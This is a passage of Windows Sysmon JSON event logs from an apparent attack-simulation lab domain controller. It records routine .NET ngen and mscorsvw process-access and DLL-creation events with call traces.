Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7941,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:19.075\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04F3-5F25-0000-001039311200}\r\nTargetProcessId: 5116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:19.075","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04F3-5F25-0000-001039311200}","TargetProcessId":"5116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7942,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:19.090\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04F3-5F25-0000-001039311200}\r\nTargetProcessId: 5116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:19.090","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04F3-5F25-0000-001039311200}","TargetProcessId":"5116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7943,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:19.325\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04F3-5F25-0000-00107E351200}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:19.325","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04F3-5F25-0000-00107E351200}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7944,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:19.325\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04F3-5F25-0000-00107E351200}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:19.325","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04F3-5F25-0000-00107E351200}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7945,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:19.325\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04F3-5F25-0000-00107E351200}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:19.325","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04F3-5F25-0000-00107E351200}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7946,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:21.293\r\nProcessGuid: {A837DB8D-04F3-5F25-0000-00107E351200}\r\nProcessId: 5112\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13f8-0\\System.Workflow.Activities.dll\r\nCreationUtcTime: 2020-08-01 06:00:21.293","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:21.293","ProcessGuid":"{A837DB8D-04F3-5F25-0000-00107E351200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13f8-0\\System.Workflow.Activities.dll","CreationUtcTime":"2020-08-01 06:00:21.293","EventReceivedTime":"2020-08-01 06:00:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7947,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:21.387\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04F5-5F25-0000-0010403B1200}\r\nTargetProcessId: 2976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:21.387","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04F5-5F25-0000-0010403B1200}","TargetProcessId":"2976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7948,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:21.387\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04F5-5F25-0000-0010403B1200}\r\nTargetProcessId: 2976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:21.387","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04F5-5F25-0000-0010403B1200}","TargetProcessId":"2976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7949,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:21.387\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04F5-5F25-0000-0010403B1200}\r\nTargetProcessId: 2976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:21.387","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04F5-5F25-0000-0010403B1200}","TargetProcessId":"2976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
